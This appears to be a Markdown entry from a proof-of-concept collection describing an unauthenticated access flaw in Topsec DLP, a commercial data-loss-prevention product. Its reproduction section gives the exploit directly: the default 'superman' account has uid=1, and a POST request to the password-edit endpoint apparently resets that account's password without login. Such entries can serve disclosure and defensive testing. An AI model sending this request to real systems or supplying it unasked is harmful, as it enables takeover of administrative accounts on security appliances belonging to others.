Awesome-POC/Web应用漏洞/天融信 DLP 未授权访问漏洞.md

22 lines
257 B
Markdown
Raw Normal View History

2022-05-17 17:43:20 +08:00
# 天融信 DLP 未授权访问漏洞
## 漏洞描述
天融信DLP存在未授权访问漏洞
## 漏洞影响
```
天融信DLP
```
## 漏洞复现
POC为
```plain
默认用户superman的uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
```